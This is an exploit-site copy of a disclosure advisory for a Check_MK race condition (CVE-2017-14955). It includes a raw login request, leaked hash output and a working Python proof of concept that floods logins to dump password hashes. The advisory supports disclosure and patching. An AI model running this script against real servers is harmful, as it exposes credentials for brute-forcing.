Search for hundreds of thousands of exploits

"Check_MK 1.2.8p25 - Information Disclosure"

Author

Exploit author

"Julien Ahrens"

Platform

Exploit platform

python

Release date

Exploit published date

2017-10-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
1. ADVISORY INFORMATION
=======================
Product:        Check_mk
Vendor URL:     https://mathias-kettner.de/check_mk.html
Type:           Race Condition [CWE-362]
Date found:     2017-09-21
Date published: 2017-10-18
CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE:            CVE-2017-14955


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.


4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.

On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):

[..]
   # Check_MK's monitoring contacts
   filename = root_dir + "contacts.mk.new"
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
   out.close()
   os.rename(filename, filename[:-4])

   # Users with passwords for Multisite
   filename = multisite_dir + "users.mk.new"
   make_nagios_directory(multisite_dir)
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
   out.close()
   os.rename(filename, filename[:-4])
[...]

When sending many concurrent authentication requests with an existing/valid
username, such as:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:

</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                             'contactgroups': ['all'],
                             'disable_notifications': False,
                             'email': u'admin@example.com',
                             'enforce_pw_change': False,
                             'last_pw_change': 0,
                             'last_seen': 0.0,
                             'locked': False,
                             'num_failed': 0,
                             'pager': '',
                             'password': '$1$400000$13371337asdfasdf',
                             'roles': ['admin'],
                             'serial': 2},

A script to automatically exploit this vulnerability can be found on [0].

6. POC
======

#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version:       <=3D 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass

# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"

proxies =3D {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content

NUM =3D 50

threads =3D []
for i in range(NUM):
    t =3D threading.Thread(target=3Dmake_session)
    threads.append(t)
    t.start()

7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.

The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)


8. SOLUTION
===========
Update to 1.2.8p26.


9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure


10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
Release DateTitleTypePlatformAuthor
2020-08-04"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"webappspython"Luis Vacacas"
2019-12-24"Django < 3.0 < 2.2 < 1.11 - Account Hijack"webappspython"Ryuji Tsutsui"
2019-10-14"Ajenti 2.1.31 - Remote Code Execution"webappspython"Jeremy Brown"
2019-09-30"TheSystem 1.0 - Command Injection"webappspython"Sadik Cetin"
2019-09-30"thesystem 1.0 - Cross-Site Scripting"webappspython"Anıl Baran Yelken"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
2019-02-15"Jinja2 2.10 - 'from_string' Server Side Template Injection"webappspythonJameelNabbo
2019-01-07"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-10-18"Check_MK 1.2.8p25 - Information Disclosure"webappspython"Julien Ahrens"
2017-09-11"Docker Daemon - Unprotected TCP Socket (Metasploit)"remotepythonMetasploit
Release DateTitleTypePlatformAuthor
2019-05-14"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection"webappsphp"Julien Ahrens"
2019-04-10"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution"webappsphp"Julien Ahrens"
2017-12-26"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation"localwindows"Julien Ahrens"
2017-10-18"Check_MK 1.2.8p25 - Information Disclosure"webappspython"Julien Ahrens"
2017-10-13"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery"webappsphp"Julien Ahrens"
2016-11-22"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting"webappsjava"Julien Ahrens"
2016-11-21"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal"webappsjava"Julien Ahrens"
2016-07-13"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities"webappsxml"Julien Ahrens"
2016-05-23"XenAPI 1.4.1 for XenForo - Multiple SQL Injections"webappsphp"Julien Ahrens"
2016-02-23"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery"webappsjson"Julien Ahrens"
2014-06-01"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)"remotewindows"Julien Ahrens"
2014-03-17"Free Download Manager - Stack Buffer Overflow"doswindows"Julien Ahrens"
2014-03-09"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution"remotewindows"Julien Ahrens"
2014-02-20"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution"remotewindows"Julien Ahrens"
2014-02-19"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow"remotewindows"Julien Ahrens"
2013-11-30"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)"localwindows"Julien Ahrens"
2013-11-18"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow"doswindows"Julien Ahrens"
2013-09-08"Watchguard Server Center - Local Privilege Escalation"localwindows"Julien Ahrens"
2013-07-02"Winamp 5.63 - Invalid Pointer Dereference"doswindows"Julien Ahrens"
2013-07-02"Winamp 5.63 - Stack Buffer Overflow"doswindows"Julien Ahrens"
2013-05-04"ABBS Audio Media Player 3.1 - '.lst' Local Buffer Overflow"localwindows"Julien Ahrens"
2013-03-22"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Local Privilege Escalation"localwindows"Julien Ahrens"
2013-03-04"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting"webappsjava"Julien Ahrens"
2013-02-23"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities"remotewindows"Julien Ahrens"
2013-02-15"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption"localwindows"Julien Ahrens"
2013-01-14"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service"doswindows"Julien Ahrens"
2013-01-14"Serva 2.0.0 - HTTP Server GET Remote Denial of Service"doswindows"Julien Ahrens"
2012-11-20"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow"localwindows"Julien Ahrens"
2012-11-12"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing"localwindows"Julien Ahrens"
2012-09-17"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow"localwindows"Julien Ahrens"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/43021/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.